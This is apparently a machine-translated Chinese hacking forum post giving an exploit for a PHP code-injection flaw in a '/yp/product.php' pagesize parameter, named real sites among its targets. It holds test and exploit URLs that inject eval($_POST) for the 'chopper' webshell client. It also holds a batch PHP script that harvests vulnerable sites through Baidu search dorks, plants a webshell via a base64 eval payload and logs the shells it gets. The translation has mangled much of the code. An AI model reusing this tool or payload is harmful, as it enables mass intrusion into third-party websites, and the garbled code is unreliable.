play enough, also a little chicken ribs, prompts the template didn't installed, and so on and so forth.. Someone coming The old na also send

Google batch still need to improve for a while to catch up on!

,

http://www.wooyun.org/bug.php? Action=view&Id=2984

test is as follows:

http://www.90sec.org/yp/product.php? Pagesize=${@ a phpinfo ()}

result:

http://www.cnqiyou.com/yp/product.php? Pagesize=${@ a phpinfo ()}

 

EXP:

http://www.cnqiyou.com/yp/product.php? Pagesize=${${% @ eval 28 $_POST [CMD] % 29}}

Direct links to chopper

http://www.script-home.com/softs/163997.html

batch EXP:

PS: according to the baidu search volume  

code is as follows:


<? PHP
the error_reporting (E_ERROR);
set_time_limit (0); </p><P> $keyword='inurl: about/joinus';//bulk keyword
$timeout=1;
$stratpage=1;
$lastpage=10000000;
the for ($I=$stratpage; $i<=$lastpage; $i++) {
$array=ReadBaiduList ($keyword, $timeout, $I);
foreach ($array as $url) {
$url_list=file (' url. TXT);
the if (in_array (" $url \ r \ n ", $url_list)) {
echo "[-] Links repeat \ n";
} else {
$fp=@ fopen (' url. TXT ', 'a');
@ fwrite ($fp, $url. "\ r \ n");
@ fclose ($fp);
print_r ("
[-] Get... $url \ r \ n ");
the if (okbug ($url)) {
$exploits=exploits ($url); </p><P> $ors=okor ($url);
the if ($ors) {
echo "[*] Shell: - >". $url. "/yp/fuck. PHP \ n";
$fp=@ fopen (' shell. TXT ', 'a');
@ fwrite ($fp, $url. "/yp/fuck. PHP \ r \ n");
@ fclose ($fp);

}} else {

print "[-] No Bug! \ n";

}}

}} </p><P> The function exploits ($url) {
$host=$url;
$port="80";
$content <A href="mailto:=a=@ eval (base64_decode ($_POST [z0])); & z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2 bfcipozskznagpsbazm9wzw4oj2z1y2sucghwjywgj2enktsgdqonqgz3cml0zsgkznasjzw % 2 fcghwiebldmfskcrfue9tvftjzmtpbmddkts % 2 fpicpow0kdubmy2xvc2uojgzwkts7zwnobygifdwtiik7zgllkck7 '" >A=='@ eval (base64_decode ($_POST [z0])); & Z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2 bfcipozskznagpsbazm9wzw4oj2z1y2sucghwjywgj2enktsgdqonqgz3cml0zsgkznasjzw % 2 fcghwiebldmfskcrfue9tvftjzmtpbmddkts % 2 fpicpow0kdubmy2xvc2uojgzwkts7zwnobygifdwtiik7zgllkck7 '</a>;
$data=' http://www.script-home.com//hack/POST/yp/product. The PHP? Pagesize=${${% @ eval 28 $_POST [a] % 29 }} HTTP/1.1 '. "\ r \ n";
$data.="X - Forwarded - For: 199.1.88.29 \ r \ n";
$data.="Referer: <a href=" http://$host\r\n ">http://$host\r\n" ;
$data.="content-type: application/x - WWW - form - urlencoded \ r \ n";
$data.="the user-agent: Mozilla/5.0 (Windows, Windows NT 5.1; en - US) Firefox/3.5.0 \ r \ n";
$data.="Host: $Host \ r \ n";
$data.="Content - Length:" strlen ($Content). "\ r \ n";
$data.="cache-control: no - Cache \ r \ n \ r \ n";
$data.=$content. "\ r \ n";
$ock=fsockopen ($host, $port);
the if (! $ock) {
echo "[*] No response from $host \ n";

} fwrite ($ock, $data);
the while (! Feof ($ock)) {$exp=
the fgets ($ock, 1024);
return $exp;

}} </p><P> The function okor ($host) {
$TMP=array ();
$datahttp://www.script-home.com//hack/=';
$fp=@ fsockopen ($host, 80, $errno, $errstr, 60).
@ fputs ($fp, "GET/yp/fuck. HTTP/1.1 PHP \ r \ nHost: $host \ r \ nConnection: Close \ r \ n \ r \ n");
the while ($fp & &! Feof ($fp))
$data.=fread ($fp, 102400);
@ fclose ($fp);
the if (strpos ($data, '200')!==false) {
return true;
} else {
return false.

}}
function okbug ($host) {
$TMP=array ();
$datahttp://www.script-home.com//hack/=';
$fp=@ fsockopen ($host, 80, $errno, $errstr, 60).
@ fputs ($fp, 'GET/yp/product. PHP? View_type=1 & catid=& pagesize={${a phpinfo ()}} & areaname=& order=HTTP/1.1'. "\ r \ nHost: $host \ r \ nConnection: Close \ r \ n \ r \ n");
the while ($fp & &! Feof ($fp))
$data.=fread ($fp, 102400);
@ fclose ($fp);
the if (preg_match ('/(the php.ini)/I ', $data)) {
return true;
} else {
return false.

}} </p><P> The function ReadBaiduList ($keyword, $timeout, $nowpage)
{
$TMP=array ();
//$datahttp://www.script-home.com//hack/=';
$nowpage=($nowpage - 1) * 10;
$fp=@ fsockopen (' http://www.baidu.com ', 80, at $errno, $errstr, $timeout);
@ fputs ($fp, "GET/s? Wd=" urlencode ($keyword). "& pn=". $nowpage. "HTTP/1.1 \ r \ nHost: [url] http://www.baidu.com [/url] \ r \ nConnection: Close \ r \ n \ r \ n");
the while ($fp & &! Feof ($fp))
$data.=fread ($fp, 1024);
@ fclose ($fp);
preg_match_all ("/\} \ \ "href=\ " HTTP/////([^ ~] *?) \ "target=\ " _blank \ "/I", $data, $TMP);
$num=count ($TMP [1]),
$array=array ();
the for ($I=0; $I <$num; $i++)
{
$row=explodes ('/', $TMP [1] [$I]);
$array []=str_replace (' http://', ' ', $row [0]);
}
return $array;

}? >


This concludes the body part